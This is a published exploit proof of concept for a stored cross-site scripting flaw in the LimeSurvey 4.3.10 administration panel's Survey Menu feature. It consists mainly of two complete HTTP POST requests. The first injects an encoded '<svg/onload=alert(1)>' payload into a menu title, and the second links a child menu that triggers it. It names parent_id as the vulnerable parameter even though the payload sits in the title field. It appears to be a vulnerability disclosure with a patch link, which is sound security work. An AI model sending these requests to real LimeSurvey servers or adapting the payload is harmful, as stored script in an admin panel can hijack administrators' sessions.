# Exploit Title: LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting # Date: 2020-08-23 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.3.10+200812 # Tested on: Ubuntu 18.04.4 # Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676 # Vulnerability Details Description : A stored cross-site scripting vulnerability exists within the "Survey Menu" functionality of the LimeSurvey administration panel. Vulnerable Parameters : Surveymenu[parent_id] # POC # Request 1 : Create a survey menu with the Surveymenu[title] parameter set to an XSS payload. POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 524 Origin: http://TARGET Connection: close Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=&Surveymenu%5Bordering%5D=0&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=realmenu&Surveymenu%5Btitle%5D=%3Csvg%2Fonload%3Dalert(1)%3E&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A40%3A10&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D= # Request 2 : Create a survey menu with the Surveymenu[parent_id] parameter set to the survey id from the previous request. The XSS payload will be triggered by this survey menu. POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 505 Origin: http://TARGET Connection: close Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=11&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=5&Surveymenu%5Bordering%5D=1&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=xssmenu&Surveymenu%5Btitle%5D=XSS+Test&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A42%3A58&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D=